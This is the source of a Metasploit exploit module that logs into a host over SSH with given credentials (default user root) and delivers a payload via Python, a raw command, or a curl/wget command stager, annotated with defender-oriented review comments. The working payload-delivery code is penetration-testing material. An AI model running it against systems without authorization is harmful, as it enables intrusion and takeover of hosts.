Path: blob/master/modules/exploits/multi/ssh/sshexec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Runs a payload on a remote host over an authenticated SSH session.
#
# Nothing here bypasses authentication: the module logs in with the
# USERNAME/PASSWORD options and then issues commands over the resulting
# session. The single reference (CVE-1999-0502) is the generic "weak
# password" entry, so the exposure is credential hygiene rather than an
# SSH protocol flaw.
#
# Reviewer notes for defenders, all taken from the metadata and code below:
# * The login path offers only the `password` and `keyboard-interactive`
#   methods, so a server that accepts public-key authentication only does
#   not give this module a way in.
# * USERNAME defaults to `root`; sshd's `PermitRootLogin` setting decides
#   whether a password login for that account can succeed at all.
# * 'SideEffects' declares ARTIFACTS_ON_DISK and IOC_IN_LOGS, i.e. the
#   authors expect traces on disk and in host logs after a run.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::SSH

  # Holds the Net::SSH session opened by #do_login.
  attr_accessor :ssh_socket

  # Registers module metadata, the target table and the datastore options.
  def initialize
    super(
      'Name' => 'SSH User Code Execution',
      'Description' => %q(
        This module connects to the target system and executes the necessary
        commands to run the specified payload via SSH. If a native payload is
        specified, an appropriate stager will be used.
      ),
      'Author' => ['Spencer McIntyre', 'Brandon Knight'],
      'References' => [
        ['CVE', '1999-0502'] # Weak password
      ],
      'License' => MSF_LICENSE,
      'Privileged' => true,
      'DefaultOptions' => {
        'PrependFork' => 'true',
        'EXITFUNC' => 'process'
      },
      'Payload' => {
        'Space' => 800_000,
        'BadChars' => "",
        'DisableNops' => true
      },
      'Platform' => %w[linux osx unix python bsd],
      'CmdStagerFlavor' => %w[bourne echo printf wget],
      # Each entry is [name, options]; a per-target 'CmdStagerFlavor'
      # replaces the module-wide list above for that target.
      'Targets' => [
        ['Linux Command', { 'Arch' => ARCH_CMD, 'Platform' => 'linux' }],
        ['Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }],
        ['Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' }],
        ['Linux armle', { 'Arch' => ARCH_ARMLE, 'Platform' => 'linux' }],
        [
          'Linux mipsle',
          { 'Arch' => ARCH_MIPSLE, 'Platform' => 'linux', 'CmdStagerFlavor' => %w[curl wget] }
        ],
        [
          'Linux mipsbe',
          { 'Arch' => ARCH_MIPSBE, 'Platform' => 'linux', 'CmdStagerFlavor' => %w[wget] }
        ],
        ['Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' }],
        [
          'OSX x86',
          { 'Arch' => ARCH_X86, 'Platform' => 'osx', 'CmdStagerFlavor' => %w[curl wget] }
        ],
        [
          'OSX x64',
          { 'Arch' => ARCH_X64, 'Platform' => 'osx', 'CmdStagerFlavor' => %w[curl wget] }
        ],
        [
          'BSD x86',
          { 'Arch' => ARCH_X86, 'Platform' => 'bsd', 'CmdStagerFlavor' => %w[printf curl wget] }
        ],
        [
          'BSD x64',
          { 'Arch' => ARCH_X64, 'Platform' => 'bsd', 'CmdStagerFlavor' => %w[printf curl wget] }
        ],
        ['Python', { 'Arch' => ARCH_PYTHON, 'Platform' => 'python' }],
        ['Unix Cmd', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' }],
        [
          'Interactive SSH',
          {
            'DefaultOptions' => {
              'PAYLOAD' => 'generic/ssh/interact',
              'WfsDelay' => 5
            },
            'Payload' => {
              'Compat' => {
                'PayloadType' => 'ssh_interact',
              }
            }
          }
        ]
      ],
      'DefaultTarget' => 0,
      # For the CVE
      'DisclosureDate' => 'Jan 01 1999',
      'Notes' => {
        'Stability' => [CRASH_SAFE,],
        'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS,],
        'Reliability' => [REPEATABLE_SESSION,],
      },
    )

    register_options(
      [
        OptString.new('USERNAME', [true, "The user to authenticate as.", 'root']),
        OptString.new('PASSWORD', [true, "The password to authenticate with.", '']),
        Opt::RHOST(),
        Opt::RPORT(22)
      ]
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false])
      ]
    )
  end

  # Runs one command over the open SSH session, waiting at most 3.5 seconds.
  #
  # @param cmd [String] command line handed to the session's exec!
  # @param opts [Hash] accepted but not read in this method
  # @return [Object] whatever exec! returns, or +true+ when the wait timed
  #   out (the value of the @timeout assignment)
  def execute_command(cmd, opts = {})
    vprint_status("Executing #{cmd}")

    result = begin
      Timeout.timeout(3.5) do
        ssh_socket.exec!(cmd)
      end
    rescue Timeout::Error
      print_warning('Timed out while waiting for command to return')
      # Remembered so #exploit tears the session down with shutdown!
      # rather than close.
      @timeout = true
    end

    result
  end

  # Opens the SSH session and stores it in #ssh_socket.
  #
  # Only the `password` and `keyboard-interactive` methods are offered to
  # the server. Every handled error ends the run through fail_with.
  #
  # @param ip [String] host to connect to
  # @param user [String] account name
  # @param pass [String] password for that account
  # @param port [Integer] SSH port
  # @return [nil]
  def do_login(ip, user, pass, port)
    ssh_options = ssh_client_defaults.merge(
      auth_methods: %w[password keyboard-interactive],
      port: port,
      password: pass
    )

    # The advanced SSH_DEBUG option turns on Net::SSH debug-level output.
    ssh_options[:verbose] = :debug if datastore['SSH_DEBUG']

    begin
      self.ssh_socket = Net::SSH.start(ip, user, ssh_options)
    rescue Rex::ConnectionError
      fail_with(Failure::Unreachable, 'Disconnected during negotiation')
    rescue Net::SSH::Disconnect, ::EOFError
      fail_with(Failure::Disconnected, 'Timed out during negotiation')
    rescue Net::SSH::AuthenticationFailed
      fail_with(Failure::NoAccess, 'Failed authentication')
    rescue Net::SSH::Exception => e
      fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
    end

    # Net::SSH.start returned without raising but gave back nothing usable.
    return if ssh_socket

    fail_with(Failure::Unknown, 'Failed to start SSH socket')
  end

  # Delegates to the CommandShell helper, with #execute_command as the
  # callback that runs the probe command.
  #
  # @param binary [String] executable name to look for
  # @param platform [String, nil] platform hint forwarded to the helper
  # @return [Object] the helper's result
  def binary_exists(binary, platform: nil)
    runner = method(:execute_command)
    Msf::Sessions::CommandShell.binary_exists(binary, platform: platform, &runner)
  end

  # Pipes the encoded payload into the first interpreter found among
  # `python`, `python3` and `python2`.
  #
  # The command line has the shape `echo "<payload>" | <interpreter>`.
  # NOTE(review): where the host records process creation, that shape should
  # appear as a shell under sshd feeding an interpreter - confirm against
  # the telemetry actually collected.
  def execute_python
    interpreter = nil
    %w[python python3 python2].each do |candidate|
      interpreter = binary_exists(candidate, platform: 'unix')
      break if interpreter
    end
    fail_with(Failure::NoTarget, 'Python was not found on the target system') if interpreter.nil?

    execute_command("echo \"#{payload.encoded}\" | #{interpreter}")
  end

  # Entry point: log in, then deliver the payload as the target requires.
  #
  # The 'Interactive SSH' target hands the session to the handler and
  # returns straight away. The 'python' platform goes through
  # #execute_python. The 'unix' platform and any ARCH_CMD target send the
  # encoded payload as a single command. Everything else goes through the
  # command stager with linemax: 500.
  def exploit
    do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])

    if target.name == 'Interactive SSH'
      handler(ssh_socket)
      return
    end

    print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")

    platform = target['Platform']
    if platform == 'python'
      execute_python
    elsif platform == 'unix'
      execute_command(payload.encoded)
    elsif target['Arch'] == ARCH_CMD
      execute_command(payload.encoded)
    else
      execute_cmdstager(linemax: 500)
    end

    # After a timed-out command the session is shut down with shutdown!;
    # otherwise it is closed normally.
    if @timeout
      ssh_socket.shutdown!
    else
      ssh_socket.close
    end
  end
end